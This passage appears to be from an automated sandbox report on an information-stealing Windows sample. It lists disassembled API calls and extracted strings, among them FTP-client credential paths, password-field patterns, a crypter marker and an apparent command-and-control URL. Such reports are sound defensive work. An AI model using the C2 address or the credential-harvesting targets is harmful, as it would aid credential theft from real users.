                                        • GetHGlobalFromStream.OLE32(?,?), ref: 00401821
                                        • GlobalLock.KERNEL32(?), ref: 0040183C
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • GlobalUnlock.KERNEL32(?), ref: 0040189A
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 004018A9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$Local$AllocFreeFromLockStreamUnlock
                                        • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                        • API String ID: 1329788818-258907703
                                        • Opcode ID: f73d219993267b487340a13a54df57fa29eb117144a87e821d9b47dadb07df4c
                                        • Instruction ID: b54e30c2f35457a0d89ca7f82b145ff6d4e454c91772d0bd22442afcf9acda1e
                                        • Opcode Fuzzy Hash: f73d219993267b487340a13a54df57fa29eb117144a87e821d9b47dadb07df4c
                                        • Instruction Fuzzy Hash: 3E2110B2D00109BEDF027FE1CC42AEE7F75AF10348F10407AB911741B1E77A9AA0AB49
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408FF9
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040902D
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004090CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: MRU
                                        • API String ID: 1332880857-344939820
                                        • Opcode ID: 77bb93efd1dc01be4c22ef4fe79974cbfc34de44d470b6e3180a8fcc01a456e5
                                        • Instruction ID: d3c31817ab902d619976ccceadcbdc0c8f00580900e2f9513ecd0cfeff69c874
                                        • Opcode Fuzzy Hash: 77bb93efd1dc01be4c22ef4fe79974cbfc34de44d470b6e3180a8fcc01a456e5
                                        • Instruction Fuzzy Hash: 1D21CA7190020DBADF11AF91CC02BDE7AB9BF04308F14C5BAB554750E1DB795B91AF98
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401D0E
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D29
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401D5F
                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: QueryValue$CloseOpen
                                        • String ID:
                                        • API String ID: 1586453840-0
                                        • Opcode ID: ed4dade05a9476d331bd24acdcb83bf85bf762a37cfe1399fd73b813753ace6b
                                        • Instruction ID: 9816e780ba7a9b61ac8f10edf5f76657af6701c34893a948d0a8da9b8a2ff839
                                        • Opcode Fuzzy Hash: ed4dade05a9476d331bd24acdcb83bf85bf762a37cfe1399fd73b813753ace6b
                                        • Instruction Fuzzy Hash: E2215C32600109EFDF218E94CD42BEF3BB9AF40354F144076F910A61B0D779EA90EB59
                                        APIs
                                        • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040C107
                                        • lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040C13C
                                          • Part of subcall function 0040BDB5: StrStrIA.SHLWAPI(?,() ), ref: 0040BDC5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcmplstrcmpi
                                        • String ID: logins$table
                                        • API String ID: 3524194181-3800951466
                                        • Opcode ID: ae73111b52554dd352ddf764a8fc3e8b7643c4bf1a7e0bb623022541fdad65b7
                                        • Instruction ID: 44bd49cda4f83470fcc6d087c12488a2d232518bbed9fb0e32f53c5fc095cd4e
                                        • Opcode Fuzzy Hash: ae73111b52554dd352ddf764a8fc3e8b7643c4bf1a7e0bb623022541fdad65b7
                                        • Instruction Fuzzy Hash: 6F31E676900209EACF21DF94CC81EDE7B7DAB05324F10836BE220B51E1DB748B559F98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: "password" : "
                                        • API String ID: 0-2310853927
                                        • Opcode ID: 9b66fc8c2ed78cf3003a553049269c39b999698440f48ec520a91f01cf9785ee
                                        • Instruction ID: 6fd9b49c0107d758d70eaf6d8f3db433f834a372e2ed034e7c7f64373fa2119f
                                        • Opcode Fuzzy Hash: 9b66fc8c2ed78cf3003a553049269c39b999698440f48ec520a91f01cf9785ee
                                        • Instruction Fuzzy Hash: C221C272C04109BEDF016BA1CC02DEE7B65AF50344F10007BF911B61A2D67D5E51E75A
                                        APIs
                                        • wsprintfA.USER32 ref: 0040D5D3
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeLocalwsprintf
                                        • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                                        • API String ID: 988369812-376751567
                                        • Opcode ID: f7d49a8ad72f4cf21b3d6b377b94dc2bbb24e2f34b5d06e0204dfc3f5d2330a9
                                        • Instruction ID: 9b64ce6408ec8dffd8ed150ebec05a6cd99c907ea882324556334bfe4ac7b373
                                        • Opcode Fuzzy Hash: f7d49a8ad72f4cf21b3d6b377b94dc2bbb24e2f34b5d06e0204dfc3f5d2330a9
                                        • Instruction Fuzzy Hash: D7015E75D40208BEDF00AAD1CC02AEF7BB9AB50308F114077F415B11D1D77E9B989A68
                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040125E
                                        • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401282
                                        • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040128E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleRead
                                        • String ID:
                                        • API String ID: 1035965006-0
                                        • Opcode ID: 78ec933cabe2413ae98f15933a1fd9dbc01acc641919ace9920baa8db8525e39
                                        • Instruction ID: 15506b23c571d90703829774804d106b072a5722cba8c36d8149df187c584029
                                        • Opcode Fuzzy Hash: 78ec933cabe2413ae98f15933a1fd9dbc01acc641919ace9920baa8db8525e39
                                        • Instruction Fuzzy Hash: FEF0EC71A50108BAEF21AB90DC13FEEBA68AB14749F1040A6B144F90E1D6B99BD4DB14
                                        APIs
                                        • lstrlenA.KERNEL32(?), ref: 00401E55
                                        • lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                        • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$lstrcatlstrcpy
                                        • String ID:
                                        • API String ID: 2414487701-0
                                        • Opcode ID: 0c82ac4435a20b255e5fbd354940b39fe16e0e402880c5c374eda0a6726505e4
                                        • Instruction ID: 84c438033dc4a40f41ec3fb1713d9b88af673f3c4c5a25ca46e0467153808a7b
                                        • Opcode Fuzzy Hash: 0c82ac4435a20b255e5fbd354940b39fe16e0e402880c5c374eda0a6726505e4
                                        • Instruction Fuzzy Hash: C8F098B5600208BFDB116E62DC85A993AA8AF2439CF00D43AF91A59152D7BD89D48B58
                                        APIs
                                          • Part of subcall function 0040190B: LocalAlloc.KERNEL32(00000040,$@,?,004024E9,?), ref: 00401919
                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401F18
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401F4D
                                        • mEA, xrefs: 00401F31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocFolderLocalPath
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$mEA
                                        • API String ID: 1254228173-1675062997
                                        • Opcode ID: fb5f00653c6ce39eea393aa24026ca7e5ea10ad40d04fcdd616c3d7be63df805
                                        • Instruction ID: f01e1469a1e48256d8c91813024c6cb2c6aefccb03a9ae4857cb1f5866c6c2f5
                                        • Opcode Fuzzy Hash: fb5f00653c6ce39eea393aa24026ca7e5ea10ad40d04fcdd616c3d7be63df805
                                        • Instruction Fuzzy Hash: A6017176A04206FBDB10DB64CC02BDAB7B5AB84754F208177F211BA1E0D7789E51DB4D
                                        APIs
                                          • Part of subcall function 00403927: WSAStartup.WSOCK32(00000101,?), ref: 0040393C
                                        • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 00410174
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: SleepStartup
                                        • String ID: Client Hash$http://oliviagurun.com/forum/viewtopic.php
                                        • API String ID: 1372284471-235408134
                                        • Opcode ID: e8958995717bf1eff2ea884972534a3bd809841e102dc6cb9ffcb47881e45ddd
                                        • Instruction ID: d8468cc61ca98c048f1a4e6ca30fb1d031ec893d0f6b7d91a2149d879d717edf
                                        • Opcode Fuzzy Hash: e8958995717bf1eff2ea884972534a3bd809841e102dc6cb9ffcb47881e45ddd
                                        • Instruction Fuzzy Hash: 5E215172D4024AAADF11ABE1C9467FF7B74AB14349F54003BE20171191D7FE4AC9C76A
                                        APIs
                                        • LoadLibraryA.KERNEL32(?,?,?,00000004,?,?,?), ref: 004F029D
                                        • VirtualProtect.KERNEL32(?,?,00000004,?,?,?), ref: 004F02BA
                                        • VirtualProtect.KERNEL32(?,?,?,?,00000004,?,?,?), ref: 004F02F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904362145.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4f0000_pbfe2Xcxue.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$LibraryLoad
                                        • String ID:
                                        • API String ID: 895956442-0
                                        • Opcode ID: 2b5772553ef6244d1a72bd7c60583d678a4cff6bcfb72224e5f17730de229e31
                                        • Instruction ID: b15dc295e2eb37ad5b1cf2ee5ccf04a01804a873405b020b8ea62fbde2d33c9b
                                        • Opcode Fuzzy Hash: 2b5772553ef6244d1a72bd7c60583d678a4cff6bcfb72224e5f17730de229e31
                                        • Instruction Fuzzy Hash: 4E11E372500114AFEB314E19CC48A7BB3ACEF81B31B16415EFD19E7201D735EC0146B5
                                        APIs
                                        • StrStrIA.SHLWAPI(00541FA8,Odin), ref: 0040A3B8
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeLocal
                                        • String ID: Odin$SiteInfo.QFP
                                        • API String ID: 2826327444-4277389770
                                        • Opcode ID: d8722ae8e74027fbc86b0e17877e9b93c7b595e10a87bfbeaae56991114685c9
                                        • Instruction ID: 0f9fe774b469cb4c63004b76ca87e96d1914e12504fab4082dec30f0f86caec2
                                        • Opcode Fuzzy Hash: d8722ae8e74027fbc86b0e17877e9b93c7b595e10a87bfbeaae56991114685c9
                                        • Instruction Fuzzy Hash: 0A0145B1500604BAEB216771CC02FEF3E59DB81314F24413BBD40B51E2DA7C5EA192AE
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004078B1
                                        • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004078E5
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407948
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpenValue
                                        • String ID:
                                        • API String ID: 4012628704-0
                                        • Opcode ID: 1684a3e24556abe0a23f1d6ae1969d8c9d86ffecdd2fe08962f1371a4863585c
                                        • Instruction ID: 36c93e17fa4935ed8e60dad1f94eeb3ebf737f654d65cb54502af1be743f887a
                                        • Opcode Fuzzy Hash: 1684a3e24556abe0a23f1d6ae1969d8c9d86ffecdd2fe08962f1371a4863585c
                                        • Instruction Fuzzy Hash: 2F11FB7280410DBADF119F90CC01BDD7BB9BF04304F1481B6B554B11A0DB79AA949F99
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 00403012
                                        • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040306E
                                        • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403079
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: closesocketconnectsocket
                                        • String ID:
                                        • API String ID: 643388700-0
                                        • Opcode ID: 27838496b508b28c9ce41aa7bba13d563701f725540d8031ff557b3f6c16d384
                                        • Instruction ID: 7183d0e0f00cb8bb8203b93de3d11375adc44777f8aecbb416517ddead41c510
                                        • Opcode Fuzzy Hash: 27838496b508b28c9ce41aa7bba13d563701f725540d8031ff557b3f6c16d384
                                        • Instruction Fuzzy Hash: A8019630905308AADF209FB58C86BFF766C6B01329F10863BF521751D5D7FC9A84971A
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F6A5
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F6D9
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F733
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID:
                                        • API String ID: 1332880857-0
                                        • Opcode ID: 30ee89dff64a3956ebf5c6a1fdb0efd66acf5260903c54ef559af976e30782db
                                        • Instruction ID: 6a0bba80eceafcbcd3279f4a796fd0b4680abd76d4c8d12bb836911ea16fbd13
                                        • Opcode Fuzzy Hash: 30ee89dff64a3956ebf5c6a1fdb0efd66acf5260903c54ef559af976e30782db
                                        • Instruction Fuzzy Hash: 0D11527681010DBADF11AF90CC02FDE7779BF14308F1085B6B914B50E1DB799A95AF98
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F608
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F638
                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F689
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID:
                                        • API String ID: 1332880857-0
                                        • Opcode ID: 4fa09c03b8c2702bb8e233395500847e9950d730bcbf4aac72ca9eca8e4fb2c1
                                        • Instruction ID: e5d5e27eb92df80b58bab79f2b31d348a1af53c7c9026c09b0652bc213c5e55c
                                        • Opcode Fuzzy Hash: 4fa09c03b8c2702bb8e233395500847e9950d730bcbf4aac72ca9eca8e4fb2c1
                                        • Instruction Fuzzy Hash: 25011E7690010CBADF21AF90CC02FDE7779BF14308F1085B6B914751A1DB7A9B95AF98
                                        APIs
                                        • StrStrIA.SHLWAPI(?,EasyFTP), ref: 0040CE69
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(?), ref: 0040247D
                                          • Part of subcall function 00402469: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040249C
                                          • Part of subcall function 00402469: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004024AE
                                          • Part of subcall function 00402469: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004024C0
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CE4B
                                        • EasyFTP, xrefs: 0040CE61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$FreeLocal
                                        • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                                        • API String ID: 1884169789-2776585315
                                        • Opcode ID: 4b7304527d10299c074e27f95e28e7b7352d0c205cebc5a19ebe2e75c95eb3cb
                                        • Instruction ID: ab360e268f661934a92a9c7bacbc8221e93e512f64475ea8205559d83ba5745b
                                        • Opcode Fuzzy Hash: 4b7304527d10299c074e27f95e28e7b7352d0c205cebc5a19ebe2e75c95eb3cb
                                        • Instruction Fuzzy Hash: DFF090B1940208BAEF217BA1CC03F9D7E659F00748F24817B7514780F1DABD9B91A65C
                                        APIs
                                        • GetHGlobalFromStream.OLE32(00000000,?), ref: 004038DF
                                        • GlobalLock.KERNEL32(?), ref: 004038F6
                                          • Part of subcall function 004036C0: InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403747
                                        • GlobalUnlock.KERNEL32(?), ref: 00403913
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Global$CrackFromInternetLockStreamUnlock
                                        • String ID:
                                        • API String ID: 1075796459-0
                                        • Opcode ID: 895562dedb02785a92424acf7e466d090eb94dad282cfa5507c4508ba70ced13
                                        • Instruction ID: 22463a1249c2eb0376aa38499e95260c1cfe8aa856205a020fab481f6bd334ac
                                        • Opcode Fuzzy Hash: 895562dedb02785a92424acf7e466d090eb94dad282cfa5507c4508ba70ced13
                                        • Instruction Fuzzy Hash: FFF04F7151020DFBDF01AFA1CC41AEE7F69AF10319F10413AB910B41B2D7B99F90EA58
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00408155
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
                                          • Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
                                          • Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
                                          • Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C
                                          • Part of subcall function 004018F4: LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                                        • String ID: \32BitFtp.ini
                                        • API String ID: 2776971706-1260517637
                                        • Opcode ID: 33a1545be78869e3d7950afb86025c13f6e9ae8639ba8b3955587ae87e9031af
                                        • Instruction ID: 9602c36f730831759174d8825f7877320977bc214c771c8561c05050c13ffa35
                                        • Opcode Fuzzy Hash: 33a1545be78869e3d7950afb86025c13f6e9ae8639ba8b3955587ae87e9031af
                                        • Instruction Fuzzy Hash: 1EF082B1500208FBDB10BAA1CC43FDE76699F20748F14047BBA44B51E2EABD9B919B5C
                                        APIs
                                        • setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 004036B7
                                        Strings
                                        Memory Dump Source
